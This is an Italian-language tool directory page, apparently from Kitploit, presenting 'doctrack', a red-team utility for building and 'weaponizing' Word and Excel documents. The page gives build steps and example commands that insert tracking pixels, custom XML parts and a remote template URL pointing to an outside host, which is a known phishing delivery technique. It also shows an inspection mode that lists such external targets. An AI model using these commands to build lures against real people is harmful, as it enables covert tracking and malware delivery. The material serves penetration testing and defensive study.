Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/wavvs/doctrack
Strumenti di PhishingGenerazione di PayloadRaccolta InformazioniRed Teaming
GitHubwavvs/doctrack

doctrack

Strumento per manipolare e weaponizzare documenti Office Open XML.

Vedi Repository
72183 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Doctrack

Strumento per manipolare e armare i documenti Office Open XML.

Caratteristiche

  • Creare documenti Office Open XML (Word, Excel)
  • Inserire pixel di tracciamento e percorsi UNC
  • Iniezione di modelli remoti
  • Inserire parti CustomXML
  • Ispezionare URL target esterni, metadati e parti XML personalizzate

Installazione

Sarà necessario scaricare .Net 6.0. Quindi, per creare un singolo binario su Windows:

root@kitploit:~
$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

Su Linux:

root@kitploit:~
$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

Utilizzo

root@kitploit:~
$ doctrack --help
Tool to manipulate and weaponize Office Open XML documents.

  -i, --input          Input filename. If doesn't exist, new file is created.
  -o, --output         Output filename. If not set, document is saved as --input
                       file.
  -m, --metadata       Metadata to supply (JSON file).
  -u, --url            URL to insert.
  -e, --template       (Default: false) If set, enables template URL injection.
  -s, --inspect        (Default: false) Inspect document.
  -c, --custom-part    Insert a Custom XML part (XML file)
  --help               Display this help screen.

Creare un documento Word e modificarne i metadati:

root@kitploit:~
$ doctrack -i test.docx -m metadata.json

Inserire un pixel di tracciamento e modificare i metadati del documento:

root@kitploit:~
$ doctrack -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

Inserire un URL di modello remoto (noto come Remote Template Injection):

root@kitploit:~
$ doctrack -i test.docx -o test.docx --url http://test.url/template.dotm --template

Inserire una parte XML personalizzata:

root@kitploit:~
$ doctrack -i test.docx -o test.docx -c part.xml

Ispezionare URL target esterni, metadati e parti XML personalizzate:

root@kitploit:~
$ doctrack -i test.docx --inspect
[External targets]
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm

[Metadata]
Creator: wavvs
Title: doctrack
Subject:
Category:
Keywords:
Description:
ContentType:
ContentStatus:
Version:
Revision:
Created: 13.10.2020 23:20:39
Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:

[CustomXML Parts]
Part: /customXML/item.xml (25 bytes)
Scarica lo strumento